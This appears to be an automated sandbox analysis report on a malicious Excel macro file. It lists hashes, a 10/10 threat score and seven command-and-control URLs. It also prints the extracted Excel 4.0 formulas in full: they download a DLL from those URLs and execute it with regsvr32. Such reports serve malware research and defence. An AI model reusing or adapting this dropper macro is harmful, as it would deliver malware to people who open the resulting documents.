Overview

overview

10

Static

static

10

5bff4c41c2...6.xlsm

windows7-x64

10

5bff4c41c2...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5bff4c41c23b76d0305aa9341f346a1f0e8eaaf8df939f9f92638e5420b97d56

  • Size

    20KB

  • Sample

    241119-nrn2navgpb

  • MD5

    846cabb84c62c435ea5d36bd6c509a30

  • SHA1

    5a31f28ff64ce79f813628292e7271e955e4851d

  • SHA256

    5bff4c41c23b76d0305aa9341f346a1f0e8eaaf8df939f9f92638e5420b97d56

  • SHA512

    6542622569a3451a2cf2c1fee0d8e99759dad3a57d603a9d38ca5b7f03f4968755026d16e659188df3a2c882d821247486e46d3c2b85356a0389f1ca953b5542

  • SSDEEP

    384:GQZAVb1GNjJITo4CGzPd6ZIwVKb5CzgObff9kC+xbX7zL0crX:GTINqTo4FL3CBn9kC+xbLHjj

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.bridgewien.at/admin/9Osvbo9caA4QYishnWka/

http://bartboutens.nl/cgi-bin/aPqSkCZXI3ueRdI/

http://aleph.org.ng/wp-includes/k8YwVWkrdmUM9/

http://alkautsarlampung.sch.id/belajar/WQlNleMJKoulGBUvgC9/

http://automyjniafordon.bydgoszcz.pl/123/mOWZgMaL/

http://www.annuncisiciliani.it/app/3l1ZgVfwIEiIcGelh/

http://autoat.mx/assets/VljikBuT029PkSBfrc/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.bridgewien.at/admin/9Osvbo9caA4QYishnWka/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bartboutens.nl/cgi-bin/aPqSkCZXI3ueRdI/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aleph.org.ng/wp-includes/k8YwVWkrdmUM9/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alkautsarlampung.sch.id/belajar/WQlNleMJKoulGBUvgC9/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://automyjniafordon.bydgoszcz.pl/123/mOWZgMaL/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.annuncisiciliani.it/app/3l1ZgVfwIEiIcGelh/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://autoat.mx/assets/VljikBuT029PkSBfrc/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.bridgewien.at/admin/9Osvbo9caA4QYishnWka/
xlm40.dropper

http://bartboutens.nl/cgi-bin/aPqSkCZXI3ueRdI/
xlm40.dropper

http://aleph.org.ng/wp-includes/k8YwVWkrdmUM9/
xlm40.dropper

http://alkautsarlampung.sch.id/belajar/WQlNleMJKoulGBUvgC9/
xlm40.dropper

http://automyjniafordon.bydgoszcz.pl/123/mOWZgMaL/
xlm40.dropper

http://www.annuncisiciliani.it/app/3l1ZgVfwIEiIcGelh/
xlm40.dropper

http://autoat.mx/assets/VljikBuT029PkSBfrc/

Targets

    • Target

      5bff4c41c23b76d0305aa9341f346a1f0e8eaaf8df939f9f92638e5420b97d56

    • Size

      20KB

    • MD5

      846cabb84c62c435ea5d36bd6c509a30

    • SHA1

      5a31f28ff64ce79f813628292e7271e955e4851d

    • SHA256

      5bff4c41c23b76d0305aa9341f346a1f0e8eaaf8df939f9f92638e5420b97d56

    • SHA512

      6542622569a3451a2cf2c1fee0d8e99759dad3a57d603a9d38ca5b7f03f4968755026d16e659188df3a2c882d821247486e46d3c2b85356a0389f1ca953b5542

    • SSDEEP

      384:GQZAVb1GNjJITo4CGzPd6ZIwVKb5CzgObff9kC+xbX7zL0crX:GTINqTo4FL3CBn9kC+xbLHjj

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks